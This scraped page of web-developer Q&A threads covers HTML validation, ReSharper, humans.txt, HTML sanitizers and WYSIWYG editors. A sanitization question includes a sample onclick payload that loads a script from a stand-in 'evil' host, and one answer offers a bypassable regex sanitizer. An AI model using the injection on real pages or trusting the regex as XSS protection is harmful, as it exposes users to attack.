Can I stop ReSharper objecting to Ionic HTML tags?

I've just opened my first Ionic-based mobile project, and the HTML templates are full of Ionic tags like <ion-modal-view>, which (courtesy of ReSharper, I deeply suspect) has a wavy blue underline, as do half the other tags in the template. I deplore working with these lines on the screen: they indicate there is something wrong (OK, maybe for the W3C it is wrong) when there is nothing wrong. Can I get rid of these damned blue lines, and if so, how?

Well, I'm a big believer in writing valid HTML. Standards are there for a reason, and we can't complain about Microsoft not following them with IE if we don't follow them ourselves.
I did some searching and couldn't find any information on whether Ionic could be written as valid HTML.
So personally, were I in your position, I'd either consider whether writing an XHTML DTD that supported Ionic's markup was an option, or choose a framework in which I could write valid markup.
Since I'm guessing neither of those is an option, you could go to:
ReSharper -> Options -> Code Inspection -> Settings
Look for the section under the heading Elements to skip.
Either find File masks and add *.html (or whatever other file extension you might be using), or find Files and folders and mark the specific files/folders that you don't want ReSharper to look at.

I want to suggest a better alternative.
Instead of skipping inspections for all *.html files, it should be possible to ignore just the inspection for unknown tags, via ReSharper's inspection severity settings.

Related

Switch browser to a strict mode in order to write proper html code

Is it possible to switch a browser to a "strict mode" in order to write proper code, at least during the development phase?
I always see invalid, dirty HTML code (besides bad JavaScript and CSS), and I feel that one reason is the high tolerance level of all browsers. So I would be ready to use a stricter mode, at least while using the browser during development, to force myself to write proper code.
Is there anything like that in any of the known browsers?
I know about the W3C validator, but honestly, who is really using it frequently?
Is there maybe some sort of regular interface between browser and validator? Are there any development environments where the validation is tested automatically?
Is there anything like that in any of the known browsers? Is there maybe some sort of regular interface between browser and validator? Are there any development environments where the validation is tested automatically?
The answer to all those questions is “No”. No browsers have any built-in integration like what you describe. There are (or were) some browser extensions that would take every single document you load and send it to the W3C validator for checking, but using one of those extensions (or anything else that automatically sends things to the W3C validator in the background) is a great way to get the W3C to block your IP address (or the IP-address range for your entire company network) for abuse of W3C services.
I know about the W3C validator, but honestly, who is really using it frequently?
The W3C validator currently processes around 17 requests every second—around 1.5 million documents every day—so I guess there are quite a lot of people using it frequently.
I always see invalid, dirty HTML code… I would be ready to use a stricter mode while using the browser during development, to force myself to write proper code.
I'm not sure what specifically you mean by “dirty HTML code” or “proper code”, but I can say that there are a lot of markup cases that are not bad or invalid but which some people mistakenly consider bad.
For example, some people think every <p> start tag should always have a matching </p> end tag, but the fact is that from the time when HTML was created, it has never required documents to have matching </p> end tags in all cases. (In fact, when HTML was created, the <p> element was basically an empty element, not a container, and so the <p> tag was simply a marker.)
Another example of a case that some people mistakenly think of as bad is unquoted attribute values; e.g., <link rel=stylesheet …>. But the fact is that unless an attribute value contains spaces or a few other special characters, it generally doesn't need to be quoted. So there's actually nothing wrong at all with markup like <link rel=stylesheet …>.
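To make that concrete, here is a small document that uses both patterns and validates with no errors (a minimal illustrative example; the html, head, and body tags are legitimately omissible too):
<!DOCTYPE html>
<meta charset=utf-8>
<title>Valid</title>
<link rel=stylesheet href=style.css>
<p>First paragraph
<p>Second paragraph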
So there's basically no point in trying to find a tool or mechanism to check for cases like that, because those cases are not actually real problems.
All that said, the HTML spec does define some markup cases as being errors, and those cases are what the W3C validator checks.
So if you want to catch real problems and be able to fix them, the answer is pretty simple: Use the W3C validator.
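If you want to automate that, the checker has a documented JSON interface. Here is a minimal sketch (assuming Node 18+ for the built-in fetch; for anything beyond occasional checks, please run a local copy of the checker rather than hammering the public service):
const { readFile } = require("node:fs/promises");

async function validate(path) {
  // POST the raw document to the Nu HTML Checker and ask for JSON output.
  const res = await fetch("https://validator.w3.org/nu/?out=json", {
    method: "POST",
    headers: { "Content-Type": "text/html; charset=utf-8" },
    body: await readFile(path, "utf8"),
  });
  const { messages } = await res.json();
  for (const m of messages) {
    // document-wide messages may carry no line number
    console.log(`${m.type} (line ${m.lastLine ?? "?"}): ${m.message}`);
  }
}

validate("index.html");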
Disclosure: I'm the maintainer of the W3C validator. 😀
As @sideshowbarker notes, there isn't anything built into browsers at the moment.
However, I do like the idea and wish there were such a tool too (that's how I got to this question).
There is a "partial" solution: if you use Firefox and view the source (not the developer tools, but CTRL+U or right-click "View Page Source"), Firefox will highlight invalid tag nesting and attribute issues in red in the raw HTML source. I find this invaluable as a first pass over a page that doesn't seem to be working.
It is quite nice because it isn't super picky (it won't complain about an unquoted attribute value or a deprecated attribute), but it highlights genuinely glitchy stuff: mangled spacing inside a tag's attributes (which would cause issues if the attributes were not quoted), a span tag that is not properly closed, a script tag outside of the html tag, and a missing doctype or content before it.
Unfortunately "seeing" these issues is a manual process... I'd love to see these in the dev console, and in all browsers.
Most plugins/extensions only get access to the DOM after it has been parsed, by which point these errors are gone or papered over... however, if there is a way to get at the raw HTML source in one of these extension models so that an extension could test for these types of errors, I'd be more than willing to help write one (DM @scunliffe on Twitter). Alternatively, this may require writing something at a lower level, like a script to run in Fiddler.

Where to place the humans.txt file if I cannot put it on the site root?

Background
I'm building a web application for a client.
This app will be accessible to the world and will be placed in a directory (e.g., /my-app) in web-root. A subdomain isn't an option as they don't want to cough up the dough for another SSL cert.
/my-app is the only directory that I'm allowed to touch (unreasonable IT guys).
I'm using an icon set which requires attribution.
I've contacted the original author of the icon set and have gotten permission to link back to his work in the THANKS section of a humans.txt file.
I also feel like I should mention some other people's work. This information combined with the above will probably take up a good 20 lines, so a separate file like humans.txt seems like an ideal place to put this considering that I'll be serving minified markup, CSS, and script files.
Questions
Since I'm not allowed to place a humans.txt file in web-root (and even if I were, it wouldn't make much sense to put it there, as it only applies to the /my-app portion of the site), is it acceptable to do the following?
Create: /my-app/humans.txt
Place: <link rel="author" href="//example.com/my-app/humans.txt"> in my markup
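For what it's worth, the file itself can be very simple; something like this, following the humanstxt.org conventions (the name and URL are placeholders):
/* THANKS */
Name: Jane Doe (icon set)
Site: http://example.com/janes-icons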
I'll be serving HTML 4.01 Strict, and author doesn't appear to be a recognized link type for the rel attribute in that specification. Do I need to do anything extra to define the author link type, or is the act of using it enough?
I don't even know if there are any non-spider tools that actually use this file at the moment, but I'd like to minimize the chance of this not working in the future when something does come along.
I think it is OK to put the file in the application's own directory, since that makes clear it is specific to the content inside the directory and not to all the other stuff you might find in the root directory.
Of course it would be nice to have zero errors in HTML 4.01 Strict. However, this is one of those situations where you have to decide whether to:
keep to the standard and not insert the link element (maybe put the credits in a comment, or as a real link on a credits page)
ignore the standard, because the standard is nice but not the holy grail (there are far worse errors you can make than this one)
choose another doctype that allows the element you want, but then test again whether all browsers render the new doctype correctly
However, I can't make this decision for you ;)

What can I use to sanitize received HTML while retaining basic formatting?

This is a common problem, I'm hoping it's been thoroughly solved for me.
In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, or other security/etc. issues, and then display it safely without losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)
The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.
We recognize that some of this may well muck up the display of the text; that's okay.
We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).
The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.
What I've found so far:
The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking the resulting DOM and filtering out anything I didn't whitelist (a sketch of that walk follows this list). The Agility Pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library
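For illustration, here's the sort of whitelist walk I mean, sketched in browser JavaScript for brevity (a real implementation here would use the Agility Pack's DOM in .Net; the tag and attribute lists are placeholders, not a vetted security whitelist):
// Sketch only: recursively drop every element and attribute that isn't white-listed.
const ALLOWED_TAGS = new Set(["P", "STRONG", "EM", "BR", "UL", "OL", "LI"]);
const ALLOWED_ATTRS = new Set(); // start empty; add attributes deliberately

function sanitize(html) {
  const doc = new DOMParser().parseFromString(html, "text/html");
  (function walk(node) {
    for (const child of Array.from(node.children)) {
      if (!ALLOWED_TAGS.has(child.tagName)) {
        if (child.tagName === "SCRIPT" || child.tagName === "STYLE") {
          child.remove(); // drop these together with their content
        } else {
          // drop the element itself but keep its text content
          node.replaceChild(doc.createTextNode(child.textContent), child);
        }
        continue;
      }
      for (const attr of Array.from(child.attributes)) {
        if (!ALLOWED_ATTRS.has(attr.name)) child.removeAttribute(attr.name);
      }
      walk(child);
    }
  })(doc.body);
  return doc.body.innerHTML;
}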
What would you recommend for this task? One of the above? Something else?
For example, we want to remove things like:
script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)
So for instance, this HTML:
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s); })();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>
would become
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>
(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
This is an older, but still relevant question.
We are using the HtmlSanitizer .Net library, which:
is open-source
is actively maintained
doesn't have problems like the Microsoft Anti-XSS library
is unit tested against the OWASP XSS Filter Evasion Cheat Sheet
is purpose-built for this (in contrast to the HTML Agility Pack, which is a parser)
It's also on NuGet.
I sense you would definitely need a parser that can produce an XML/DOM tree, so that you can apply filters to it and produce what you are looking for.
See if the HtmlTidy, Mozilla, or HtmlCleaner parsers can help. HtmlCleaner has a lot of configurable options which you might also want to look at, specifically the transform section, which allows you to skip the tags you don't require.
I would suggest using another approach. If you control the method by which the HTML is viewed, I would remove all threats by using an HTML renderer that doesn't have an ECMAScript engine, or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so: you want to produce HTML that cannot be used to attack your users.
I recommend looking for a basic HTML display engine, one that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the JavaScript would then simply be ignored.
This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.
I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.
Interesting problem. I took some time facing it, because there are a lot of things we want to remove from user input, and even if I made a long list of things to be removed, HTML can evolve later on and my list would end up with holes.
Nonetheless, I want users to be able to input some simple things like bold, italic, paragraphs... pretty simple.
No doubt the list of allowed things is shorter, and if HTML changes later on, that won't make holes in my list, unless HTML stops supporting these simple things.
So, thinking the other way around: state just what you allow. With great pain, because I'm not an expert on regex (so please, some regex people, correct or improve this), I coded this expression, and it has been working for me since before HTML5 arrived:
replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")
(b|i|p|br) <- this is the list of allowed tags; feel free to add some.
This is a starting point, and that's why some regex people should improve it, to also remove the attributes, like onclick.
If I do this:
(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>
tags with onclick or other stuff will be removed, but the corresponding closing tags will remain; and after all, we don't want those tags removed, we just want to remove their attributes.
Maybe a second regex pass with
(?!<[^<>\s]+)\s[^</>]+(?=[/>])
Am I right? Can this be composed into a single pass?
We still have no relation between tags (opening/closing), but that's no great deal so far.
Can the attribute removal be written so it removes everything not on a white list? (Possibly, yes.)
One last problem: when removing tags like script, the content remains. Keeping the content is desirable when removing font, but not script. Well, we can do a first pass with
<(script|object|embed)[^>]*>.*</\1>
which will remove certain tags and their content... but it's a black list, meaning you have to keep an eye on it in case HTML changes.
Note: all with the "gi" flags.
Edit: I joined all of the above into this function:
String.prototype.sanitizeHTML = function (white, black) {
  if (!white) white = "b|i|p|br";            // white list: tags to keep
  if (!black) black = "script|object|embed"; // black list: tags removed together with their content
  // One pass, three alternatives: a black-listed tag plus its content,
  // any tag not on the white list, or an attribute on the tags that remain.
  var e = new RegExp("(<(" + black + ")[^>]*>.*</\\2>|(?!<[/]?(" + white + ")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
  return this.replace(e, "");
};
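A quick check with the defaults:
'<p onclick="alert(1)">Hi <script>evil()</script><b>there</b></p>'.sanitizeHTML();
// returns: '<p>Hi <b>there</b></p>'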
- black list -> the tag and its content are removed completely
- white list -> the tags are retained
Other tags are removed, but their content is retained.
All attributes of the white-listed tags (the ones that remain) are removed.
There is still room for a white list of attributes (not implemented above), because if I want to preserve img then the src must stay... and then what about tracking images?

WYSIWYG browser editor that generates *good* HTML?

I'm searching for a "suck less" WYSIWYG in-browser X?HTML editor that generates good HTML code.
(no <font>, <foo style="...">, <p></p><span></span><p><span> </span><span><span>blah</span></span></p> and so on -- <b> and <i> etc. is OK).
Should be easy-to-use as it is going to be used by people that do not know what HTML is.
Any suggestions?
Extra points for Copy-and-Paste-from-Word-readiness! :-)
(I found a lot of editors, but they all create that <font> and nested <span> crap that breaks site design and bloats a page with a single table up to 100 kB.)
Download the current version of CKEditor and look at the XHTML output sample. It shows how to use full WYSIWYG while generating no font tags or inline styles. You just need to adjust the configuration to your needs.
What about WYMEditor?
WYMeditor has been created to generate perfectly structured XHTML strict code, to conform to the W3C XHTML specifications and to facilitate further processing by modern applications.
With WYMeditor, the code can't be contaminated by visual information like font styles and weights, borders, colors, ... The end user defines the content's meaning, which will determine its appearance through the use of style sheets. The result is easy and quick maintenance of information.
I've used it a little and while it takes quite a bit of tweaking if you have very specific needs, it does work out of the box for simple XHTML editing. If you set up specially annotated CSS files then it will detect the styles you want users to use and block level elements to which they apply. You can also tell it how to display these styles in the editor (which might be different from how you want them displayed in the resulting XHTML).
Of course, it generates XHTML, not HTML, so it may not meet your exact needs.
Wikipedia has a category for them:
http://en.wikipedia.org/wiki/Category:JavaScript-based_HTML_editors
You can use Markdown with the WMD UI; it's the combination used by Stack Overflow. It always produces valid HTML code.
I just recently searched for an editor to create solid documentation, whose output is suitable for Subversion diffs: https://superuser.com/questions/126621/wysiwyg-editor-for-structured-text-suitable-for-svn-versioning
The editor that was suggested - "KompoZer" - turned out to be fantastic, especially because it generates very clean HTML (in my opinion). And I say that, although I had originally preferred something leaner than HTML.
P.S. Reading your question again, I'm not sure what you mean by a "browser editor" - are you looking for an editor that can be embedded in an HTML page? KompoZer is based on a browser, but it probably can't be embedded in an HTML page.
I recently switched one of my projects to markdown to avoid this exact issue. There's still a bit of a learning curve for the users but I haven't had to deal with the usual issues that occur when they copy/paste content from Word and wonder why it blew up.
Having said that, I prefer CKEditor over TinyMCE and the Telerik controls. I've generally found it generates somewhat cleaner HTML.
There are several WYSIWYG editors for embedding within your website out there.
WYMeditor (http://www.wymeditor.org/) looks very nice and seems to be a good fit for targeting clean and valid XHTML results.
Spaw2. Although it's kinda abandoned now.
The Apple Cocoa NSTextView class exports quite nice HTML, where all the styling is done through a style sheet specified in the header. The Apple TextEdit editor uses this.
http://tinymce.moxiecode.com/ - easy to use, can import from Word, and can restrict formatting to predefined CSS styles, to provide consistent output.
This post is 8+ years old now but still relevant...
I found an awesome GitHub page with a curated list of WYSIWYG editors, including a few WYSIWYM ones which guarantee sane HTML. As of 2018, the most current and best WYSIWYM one looks like ProseMirror, or maybe ORY Editor if you're looking for something to edit entire webpages(!) in one text field.

How do you find mismatched tags in HTML?

I've inherited some rather large static HTML files that need to be fixed up to work in webkit-based browsers, Safari in particular. One of the common bugs I've found that cause rendering differences is missing </div> tags. (Both IE7+ and FF3+ seem to ignore these, or make good guesses as to where to close the DIVs, and render as expected.) I'm used to using vim with HTML syntax highlighting for editing, but end up writing awk scripts to match starting and ending tags.
What is your favorite tool or technique for matching start and end tags in a large HTML file?
UPDATE: I'm currently in a shop that targets HTML 4.01 Strict, not XHTML.
The W3C HTML Validator works fairly well; or, if you want something a little simpler, the Tidy Firefox plugin also works.
The W3C validator can be (extremely) verbose, but it does check for missing closing tags.
HTML Tidy is a great command-line tool. I often use it with wget.
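For example (a sketch: tidy reads the page from standard input; its -e flag shows only errors and warnings, and -q suppresses nonessential output):
wget -qO- http://example.com/page.html | tidy -e -q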
Most IDEs let you know via highlighting, a fuzzy underline, or a warning.
Div Checker is a great tool that focuses on div tags specifically.
While other tools were only able to tell me that "some tag is missing somewhere", Div Checker removes other tags, code, and most comments to create a clean visual structure of just the divs themselves.
From this div map, it's fairly easy to see whether nested divs are correctly paired!
I was able to locate a missing div left out by a WordPress theme developer with the help of this tool.
Here is the posted answer from @noah-whitmore that enlightened me to this awesome tool.
There are a couple of other useful tools mentioned in that thread as well, such as unclosed-tag-finder (visually not so easy to read, but helpful if your missing tag is not a div).
vim/gvim & NetBeans both do a great job of tag matching
What is your favorite tool or technique for matching start and end tags in a large HTML file?
A text editor with a built-in XML well-formedness checker, combined with using XHTML for everything.
Sublime Text with the Tag plugin has a Tag Lint feature which aims to check the correctness of opened and closed tags.